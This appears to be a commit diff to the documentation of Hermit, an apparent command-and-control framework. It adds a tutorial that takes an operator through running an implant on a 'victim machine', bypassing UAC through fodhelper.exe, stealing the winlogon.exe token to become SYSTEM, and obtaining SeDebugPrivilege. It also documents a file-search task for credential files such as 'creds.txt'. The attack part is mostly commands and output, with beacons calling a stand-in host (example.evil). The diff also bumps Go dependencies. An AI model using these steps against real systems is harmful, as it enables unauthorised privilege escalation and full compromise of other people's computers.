Added a new tutorial: Privilege Escalation with Implant Beacon

docs/guides/task.md

@@ -18,6 +18,7 @@ TASK:
   download        Download a file.
   env ls          List environment variables.
   envs            alias for 'env ls'
+  find            Find files.
   group ls        List local groups.
   groups          Alias for 'group ls'.
   history         Retrieve information from history files of applications
@@ -49,6 +50,7 @@ TASK:
   sleep           Set sleep time (seconds) between requests from beacon.
   token revert    Revert back to the original process token.
   token steal     Steal token from the specified process and impersonate process.
+  uac             Bypass UAC and start another session.
   upload          Upload a file to the target computer.
   user ls         List users.
   users           Alias for 'user ls'.
@@ -133,6 +135,15 @@ Hermit [agent-abcd] > download C:/Users/John/Desktop/example.txt /tmp/example.tx
 
 Lists environment variables in victim machine.
 
+## `find`
+
+Find files or directories that contain the specified strings.
+
+```sh
+# -n: Specified strings
+Hermit [agent-abcd] > find -n "creds.txt" ./
+```
+
 ## `group`
 
 ### `group ls`, `groups`

docs/tutorials/privilege-escalation-with-implant-beacon.md

@@ -0,0 +1,229 @@
+# Privilege Escalation with Implant Beacon
+
+In this tutorial, we're going to  escalate privilege to **System** user with implant beacon on Windows victim machine.  
+
+Assume that you've already done [the Tutorial: Simple Implant Beacon](./simple-implant-beacon.md).  
+
+## 1. Start Implant & Activate Agent Mode
+
+Because we've already learned the basic operation for an implant in the previous tutorial, we proceed as follows without detailed explanations:
+
+```sh title="Hermit C2 Server Console"
+# 1. Start Hermit server.
+./hermit
+
+# 2. Start listener.
+Hermit > listener new
+
+# 3. Generate an implant (beacon, windows/amd64/exe).
+Hermit > payload gen
+
+# 4. Transfer the implant to Windows victim machine and execute it.
+
+# Wait until the agent callbacks...
+
+# 5. Activate the Agent Mode.
+Hermit > agent use 1
+Hermit [agent-stephan] >
+```
+
+Now we can send tasks to the agent and get result callbacks.
+
+## 2. Check the Current Privileges
+
+Because we want to compare the privileges before/after, check the current privileges with the following command at first:
+
+```sh title="Hermit C2 Server Console"
+Hermit [agent-stephan] > whoami --priv
+```
+
+This command prints the current privileges.  
+After a few seconds, see the result:
+
+```sh title="Hermit C2 Server Console"
+Hermit [agent-stephan] > task results
+
+2024-05-13 09:53:55 : whoami priv
+=================================
+x SeShutdownPrivilege
+o SeChangeNotifyPrivilege
+x SeUndockPrivilege
+x SeIncreaseWorkingSetPrivilege
+x SeTimeZonePrivilege
+```
+
+In most cases we should get the result similar to the above.  
+However, these privielges are not enough for highly sensitive operations, so we want more higher authority.  
+
+Now escalate privilege.
+
+## 3. UAC Bypass
+
+**Hermit** has useful command (task) to bypass UAC, so we're going to use the method.  
+Run the `uac` task on the C2 server console:
+
+```sh title="Hermit C2 Server Console"
+Hermit [agent-stephan] > uac
+Technique: fodhelper
+```
+
+This task bypasses **UAC** by abusing `fodhelper.exe` and start another **implant** process.  
+Wait until the task result will be callback, then check the result:
+
+```sh title="Hermit C2 Server Console"
+Hermit [agent-stephan] > task results
+
+2024-05-13 09:54:05 : uac --technique fodhelper
+===============================================
+Success: The fodhelper.exe and another process started successfully.
+```
+
+Okay, now the implant **'escalated'** process has started.  
+Exit the current agent mode and check another agent session:
+
+```sh title="Hermit C2 Server Console"
+Hermit [agent-stephan] > exit
+Hermit > agents
+[+]
+ID  Name             IP           OS/Arch        Hostname         ListenerURL                 ImplantType  CheckIn              SessionID
+1   agent-stephan    172.20.32.1  windows/amd64  VICTIM-MACHINE   https://example.evil:56692  beacon       2024-05-13 09:53:17  Imh2EvmDAJOglBMJZjBddB1Dib5UyJt2
+2   agent-elizabeth  172.20.32.1  windows/amd64  VICTIM-MACHINE   https://example.evil:56692  beacon       2024-05-13 09:54:12  HHqvfKw8I5Lu4bzmH6MFknjKO7YFV3lG
+```
+
+We should see another agent listed as above. Switch to this newly agent mode:
+
+```sh title="Hermit C2 Server Console"
+Hermit > agent use 2
+Hermit [agent-elizabeth] >
+```
+
+Now check the privilege:
+
+```sh title="Hermit C2 Server Console"
+Hermit [agent-elizabeth] > whoami --priv
+
+# Wait until the result will be callback...
+
+Hermit [agent-elizabeth] > task results
+
+2024-05-13 09:54:41 : whoami priv
+=================================
+x SeIncreaseQuotaPrivilege
+x SeSecurityPrivilege
+x SeTakeOwnershipPrivilege
+x SeLoadDriverPrivilege
+x SeSystemProfilePrivilege
+x SeSystemtimePrivilege
+x SeProfileSingleProcessPrivilege
+x SeIncreaseBasePriorityPrivilege
+x SeCreatePagefilePrivilege
+x SeBackupPrivilege
+x SeRestorePrivilege
+x SeShutdownPrivilege
+x SeDebugPrivilege
+x SeSystemEnvironmentPrivilege
+o SeChangeNotifyPrivilege
+x SeRemoteShutdownPrivilege
+x SeUndockPrivilege
+x SeManageVolumePrivilege
+o SeImpersonatePrivilege
+o SeCreateGlobalPrivilege
+x SeIncreaseWorkingSetPrivilege
+x SeTimeZonePrivilege
+x SeCreateSymbolicLinkPrivilege
+x SeDelegateSessionUserImpersonatePrivilege
+```
+
+You can see that the privileges have changed from the ones we initially checked.  
+Sicne we have **SeImpersonatePrivilege**, we can abuse it for privilege escalation with Token Manipulation!
+
+## 4. Token Stealing
+
+We're going to steal token and impersonate logged-on as **SYSTEM** user with Token Manipulation technique.  
+Firstly, enumerate running proccesses and find a process which is available to our purpose so run the following command:
+
+```sh title="Hermit C2 Server Console"
+Hermit [agent-elizabeth] > ps ls
+
+# Wait until the result callback...
+
+Hermit [agent-elizabeth] > task results
+
+2024-05-13 10:13:23 : ps ls --exclude  --filter
+================================================
+ PID    Name
+ ---    ----
+ 0
+ 4      System
+ 72     Registry
+ 532    smss.exe
+ 640    csrss.exe
+ 736    wininit.exe
+ 744    csrss.exe
+ 792    winlogon.exe
+ ...
+```
+
+In the result, we can use the `winlogon.exe` process (PID: 792).  
+Then try stealing using this PID:
+
+```sh title="Hermit C2 Server Console"
+# -p 792: Set the target PID 792.
+# --login: Enable impersonate logged-on.
+Hermit [agent-elizabeth] > token steal -p 792 --login
+
+# Wait until the result will be callback...
+
+Hermit [agent-elizabeth] > task results
+
+2024-05-13 10:14:32 : token steal --pid 792 --login true
+===============================================================================
+Success: Token has been stolen successfully.
+```
+
+If this task is succussful, we should be now **SYSTEM** user.  
+Check that with the following commands:
+
+```sh title="Hermit C2 Server Console"
+Hermit [agent-elizabeth] > whoami
+Hermit [agent-elizabeth] > whoami --priv
+```
+
+We should see that we're **SYSTEM** user and have more highly privileges enabled as follow:
+
+```sh title="Hermit C2 Server Console"
+Hermit [agent-elizabeth] > task results
+
+2024-05-13 10:14:40 : whoami
+============================
+VICTIM-MACHINE\SYSTEM
+
+2024-05-13 10:14:51 : whoami priv
+=================================
+x SeIncreaseQuotaPrivilege
+x SeSecurityPrivilege
+x SeTakeOwnershipPrivilege
+x SeLoadDriverPrivilege
+x SeSystemProfilePrivilege
+x SeSystemtimePrivilege
+x SeProfileSingleProcessPrivilege
+x SeIncreaseBasePriorityPrivilege
+x SeCreatePagefilePrivilege
+x SeBackupPrivilege
+x SeRestorePrivilege
+x SeShutdownPrivilege
+o SeDebugPrivilege
+x SeSystemEnvironmentPrivilege
+o SeChangeNotifyPrivilege
+x SeRemoteShutdownPrivilege
+x SeUndockPrivilege
+x SeManageVolumePrivilege
+o SeImpersonatePrivilege
+o SeCreateGlobalPrivilege
+x SeIncreaseWorkingSetPrivilege
+x SeTimeZonePrivilege
+x SeCreateSymbolicLinkPrivilege
+x SeDelegateSessionUserImpersonatePrivilege
+```
+
+Of particular note is that we own **SeDebugPrivilege**. With this privilege, we can do many things on this victim machine.

docs/tutorials/simple-implant-beacon.md

@@ -86,6 +86,7 @@ TASK:
   download        Download a file.
   env ls          List environment variables.
   envs            alias for 'env ls'
+  find            Find files.
   group ls        List local groups.
   groups          Alias for 'group ls'.
   history         Retrieve information from history files of applications
@@ -117,6 +118,7 @@ TASK:
   sleep           Set sleep time (seconds) between requests from beacon.
   token revert    Revert back to the original process token.
   token steal     Steal token from the specified process and impersonate process.
+  uac             Bypass UAC and start another session.
   upload          Upload a file to the target computer.
   user ls         List users.
   users           Alias for 'user ls'.
@@ -169,4 +171,8 @@ Hermit > listener stop 1
 Hermit > listener delete 1
 ```
 
-`1` is the listener ID that can be seen by `listeners` command.
+`1` is the listener ID that can be seen by `listeners` command.
+
+## Attack Further...
+
+If you'd like to escalate privilege, please try [the Tutorial: Privilege Escalation with Implant Beacon](./privilege-escalation-with-implant-beacon.md).

go.mod

@@ -7,48 +7,52 @@ require (
 	github.com/briandowns/spinner v1.23.0
 	github.com/chzyer/readline v1.5.1
 	github.com/fatih/color v1.16.0
+	github.com/gin-contrib/sessions v1.0.1
 	github.com/gin-gonic/gin v1.9.1
 	github.com/google/uuid v1.6.0
 	github.com/gorilla/websocket v1.5.1
 	github.com/manifoldco/promptui v0.9.0
 	github.com/mattn/go-shellwords v1.0.12
 	github.com/mattn/go-sqlite3 v1.14.22
 	github.com/rodaine/table v1.1.1
-	golang.org/x/term v0.18.0
+	golang.org/x/term v0.19.0
 	golang.org/x/text v0.14.0
 	google.golang.org/grpc v1.61.1
 	google.golang.org/protobuf v1.33.0
 )
 
 require (
-	github.com/bytedance/sonic v1.9.1 // indirect
-	github.com/chenzhuoyu/base64x v0.0.0-20221115062448-fe3a3abad311 // indirect
+	github.com/bytedance/sonic v1.11.3 // indirect
+	github.com/chenzhuoyu/base64x v0.0.0-20230717121745-296ad89f973d // indirect
+	github.com/chenzhuoyu/iasm v0.9.1 // indirect
 	github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc // indirect
-	github.com/gabriel-vasile/mimetype v1.4.2 // indirect
+	github.com/gabriel-vasile/mimetype v1.4.3 // indirect
 	github.com/gin-contrib/sse v0.1.0 // indirect
 	github.com/go-playground/locales v0.14.1 // indirect
 	github.com/go-playground/universal-translator v0.18.1 // indirect
-	github.com/go-playground/validator/v10 v10.14.0 // indirect
+	github.com/go-playground/validator/v10 v10.19.0 // indirect
 	github.com/goccy/go-json v0.10.2 // indirect
 	github.com/golang/protobuf v1.5.4 // indirect
+	github.com/gorilla/context v1.1.2 // indirect
+	github.com/gorilla/securecookie v1.1.2 // indirect
+	github.com/gorilla/sessions v1.2.2 // indirect
 	github.com/json-iterator/go v1.1.12 // indirect
-	github.com/klauspost/cpuid/v2 v2.2.4 // indirect
+	github.com/klauspost/cpuid/v2 v2.2.7 // indirect
 	github.com/kr/pretty v0.3.1 // indirect
-	github.com/leodido/go-urn v1.2.4 // indirect
+	github.com/leodido/go-urn v1.4.0 // indirect
 	github.com/mattn/go-colorable v0.1.13 // indirect
 	github.com/mattn/go-isatty v0.0.20 // indirect
 	github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd // indirect
 	github.com/modern-go/reflect2 v1.0.2 // indirect
-	github.com/pelletier/go-toml/v2 v2.0.8 // indirect
+	github.com/pelletier/go-toml/v2 v2.2.0 // indirect
 	github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 // indirect
 	github.com/rogpeppe/go-internal v1.10.0 // indirect
-	github.com/stretchr/testify v1.9.0 // indirect
 	github.com/twitchyliquid64/golang-asm v0.15.1 // indirect
-	github.com/ugorji/go/codec v1.2.11 // indirect
-	golang.org/x/arch v0.3.0 // indirect
-	golang.org/x/crypto v0.21.0 // indirect
-	golang.org/x/net v0.22.0 // indirect
-	golang.org/x/sys v0.18.0 // indirect
+	github.com/ugorji/go/codec v1.2.12 // indirect
+	golang.org/x/arch v0.7.0 // indirect
+	golang.org/x/crypto v0.22.0 // indirect
+	golang.org/x/net v0.24.0 // indirect
+	golang.org/x/sys v0.19.0 // indirect
 	google.golang.org/genproto/googleapis/rpc v0.0.0-20231106174013-bbf56f31fb17 // indirect
 	gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c // indirect
 	gopkg.in/yaml.v3 v3.0.1 // indirect